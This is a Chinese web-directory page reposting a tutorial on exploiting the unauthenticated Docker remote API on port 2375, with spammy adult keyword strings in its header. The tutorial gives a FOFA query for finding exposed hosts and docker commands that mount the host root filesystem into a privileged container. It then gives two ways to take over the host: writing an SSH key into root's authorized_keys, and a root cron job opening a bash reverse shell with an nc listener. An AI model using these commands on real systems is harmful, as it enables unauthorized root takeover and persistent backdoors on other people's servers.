日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

目錄
  • docker api未授權(quán)訪問漏洞
    • 00×1 漏洞成因
    • 00×2 信息收集
    • 00×3 漏洞利用
      • ssh連接
      • 寫計劃任務(wù)

因為docker賦有遠程的遠程控制,docker開放了一個tcp端口2375,如果沒有限制訪問的話,攻擊者就會通過這個端口來通過docker未授權(quán)來獲取服務(wù)器權(quán)限。

docker api未授權(quán)訪問漏洞

00×1 漏洞成因

因為docker賦有遠程的遠程控制,docker開放了一個tcp端口2375,如果沒有限制訪問的話,攻擊者就會通過這個端口來通過docker未授權(quán)來獲取服務(wù)器權(quán)限。

00×2 信息收集

FOFA中搜索port = 2375 && status_code = "404"

訪問站點2375端口,顯示

Docker API 未授權(quán)訪問漏洞問題解析

訪問/info目錄,查看版本信息

Docker API 未授權(quán)訪問漏洞問題解析

證明改站點存在docker未授權(quán)訪問漏洞

00×3 漏洞利用

docker -H tcp://ip ps -a 查看容器
dokcer -H tcp:// images 查看鏡像

為了獲取宿主機的權(quán)限,我們需要把宿主機的根目錄掛載到docker容器中

docker -H tcp://ip run -it  --privileged=true -v /:/mnt --entrypoint /bin/bash image-id

–privileged=true:使用該參數(shù),container內(nèi)的root擁有真正的root權(quán)限。

-v /:/mnt:將宿主機的根目錄掛載到/mnt目錄下

–entrypoint /bin/bash:指定鏡像的默認入口命令,該入口命令會在啟動容器時作為根命令執(zhí)行,所有其他傳入值作為該命令的參數(shù),用法ENTRYPOINT command param1 param2

Docker API 未授權(quán)訪問漏洞問題解析

現(xiàn)在就拿到了root權(quán)限,利用方式有很多種

ssh連接

 ssh-keygen -t rsa        //生成一個ssh公鑰
 cat /root/.ssh/id_rsa.pub       //查看生成的公鑰
 echo "公鑰內(nèi)容" > /mnt/root/.ssh/authorized_keys   //寫公鑰
 ssh root@目標ip -i id_rsa    //ssh進行連接

寫計劃任務(wù)

nc -lvvp port 		//開啟監(jiān)聽
echo "* * * * * /bin/bash -i >& /dev/tcp/ip/port 0>&1" >  /mnt/var/spool/cron/root   	///反彈shell

分享到:
標簽:授權(quán) 服務(wù)器 漏洞 解析 訪問
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨大挑戰(zhàn)2018-06-03

數(shù)獨一種數(shù)學游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數(shù)有氧達人2018-06-03

記錄運動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定